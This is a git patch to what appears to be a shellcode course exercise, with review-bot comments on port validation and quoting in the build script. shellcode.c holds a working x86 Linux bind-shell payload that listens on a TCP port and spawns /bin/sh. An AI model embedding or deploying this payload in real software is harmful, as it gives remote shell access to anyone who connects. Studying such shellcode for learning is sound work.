From b0ff2181463bc8d37f696cb9c121f61843f01d8f Mon Sep 17 00:00:00 2001
From: arno01
Date: Mon, 11 Mar 2013 23:34:58 +0100
Subject: [PATCH] Minor updates
---
 exam1/compile_all.sh | 11 +++++++++--
 exam1/shellcode.c | 2 +-
 2 files changed, 10 insertions(+), 3 deletions(-)
diff --git a/exam1/compile_all.sh b/exam1/compile_all.sh
index 01e0446..df5088f 100755
--- a/exam1/compile_all.sh
+++ b/exam1/compile_all.sh
@@ -35,9 +35,11 @@ fi
 if [ -z "$ARG2" ]; then
 echo " [I] Default port will be used."
-elif ! [[ $ARG2 -ge 1 && $ARG2 -le 65535 ]]; then
- echo " [E] The port must be in range 1..65535 !"
+elif ! [[ $ARG2 -ge 1024 && $ARG2 -le 65535 ]]; then
+ echo " [E] The port must be in range 1024..65535 !"
 exit 1;
+else
+ echo " [I] Using custom port: "$ARG2
 fi
 echo " [+] Assembling "$1".nasm with NASM ..."
@@ -54,6 +56,11 @@ else
 FULL_SHELLCODE=$(echo -n $SHELLCODE | sed 's/.........$//' ; echo $PORT_HEX"\"")
 fi
+if [[ $FULL_SHELLCODE == *00* ]]; then
+ echo " [E] Your shellcode contains 00 (NULL) ! Most likely you need to change your port."
+ exit 1
+fi
+
 echo -ne " [+] Shellcode size is "$(echo -ne $FULL_SHELLCODE|sed 's/\"//g'|wc -c)" bytes\n"
 echo $FULL_SHELLCODE
diff --git a/exam1/shellcode.c b/exam1/shellcode.c
index 65c3b5f..dbc7a19 100644
--- a/exam1/shellcode.c
+++ b/exam1/shellcode.c
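Review bot: In exam1/compile_all.sh (hunk at -35,9) the new `elif ! [[ $ARG2 -ge 1024 && $ARG2 -le 65535 ]]` still passes the raw argument to `-ge`/`-le`, which bash evaluates as an arithmetic expression. A non-numeric value is therefore evaluated instead of being rejected as text. Check the form first: `elif ! [[ $ARG2 =~ ^[1-9][0-9]*$ && $ARG2 -ge 1024 && $ARG2 -le 65535 ]]; then`. The added `echo " [I] Using custom port: "$ARG2` leaves `$ARG2` outside the quotes; `echo " [I] Using custom port: $ARG2"` avoids word splitting and globbing. The new lower bound of 1024 is not explained anywhere in the hunk, so a one-line comment giving the reason would help.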
@@ -1,7 +1,7 @@ #include #include -unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xff\xff"; +unsigned char code[] = "\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x6d\x5f\x31\xc0\xb0\x66\x31\xdb\xb3\x02\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\x31\xc0\xb0\x66\x31\xdb\xb3\x05\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc0\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\xe8\x8e\xff\xff\xff\xaa\xff"; main() {
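Review bot: The only change to the `code[]` literal is the second-to-last byte, `\xff` to `\xaa`, and nothing in exam1/shellcode.c says what the trailing bytes mean. In the same commit, compile_all.sh strips the tail of the generated string and appends `$PORT_HEX`, so these two bytes appear to be the port. A comment above the array, such as `/* generated by compile_all.sh; last two bytes are the TCP port (aa ff here) */`, would let a reader see which port this harness uses without decoding the blob. The body of `main` lies outside the hunk.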